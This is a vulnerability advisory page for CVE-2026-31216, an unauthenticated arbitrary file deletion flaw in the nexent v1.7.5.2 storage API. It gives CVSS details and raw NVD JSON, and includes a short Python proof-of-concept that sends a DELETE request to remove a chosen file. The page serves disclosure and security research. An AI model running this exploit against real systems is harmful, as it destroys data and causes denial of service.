CVE-2026-31216

Description

The nexent v1.7.5.2 backend service contains an unauthorized arbitrary storage file deletion vulnerability in its file management API. The DELETE /storage/{object_name:path} endpoint lacks authentication, authorization, and input validation mechanisms. Unauthenticated remote attackers can send crafted requests with a user-controlled object_name path parameter to delete arbitrary files from the underlying MinIO storage system. Successful exploitation leads to data loss and denial of service.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

nexent v1.7.5.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_host, file_path):
    # The vulnerable endpoint allowing unauthenticated file deletion
    url = f"{target_host}/storage/{file_path}"
    
    try:
        # Sending DELETE request without authentication headers
        response = requests.delete(url, timeout=10)
        
        if response.status_code == 204 or response.status_code == 200:
            print(f"[+] Exploit successful: File '{file_path}' has been deleted.")
            return True
        else:
            print(f"[-] Exploit failed: Server returned status {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Connection error: {e}")
        return False

if __name__ == "__main__":
    target = "http://127.0.0.1:8080" # Replace with actual target
    sensitive_file = "config/app_settings.json" # Replace with target file path
    exploit(target, sensitive_file)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31216
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31216
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31216/
[4] VulDB https://vuldb.com/cve/CVE-2026-31216
[5] https://github.com/ModelEngine-Group/nexent
[6] https://www.notion.so/CVE-2026-31216-35d1e139318881208297f0fbd8005f68

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31216", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:13.493", "lastModified": "2026-05-13T15:52:25.637", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The nexent v1.7.5.2 backend service contains an unauthorized arbitrary storage file deletion vulnerability in its file management API. The DELETE /storage/{object_name:path} endpoint lacks authentication, authorization, and input validation mechanisms. Unauthenticated remote attackers can send crafted requests with a user-controlled object_name path parameter to delete arbitrary files from the underlying MinIO storage system. Successful exploitation leads to data loss and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://github.com/ModelEngine-Group/nexent", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31216-35d1e139318881208297f0fbd8005f68", "source": "[email protected]"}]}}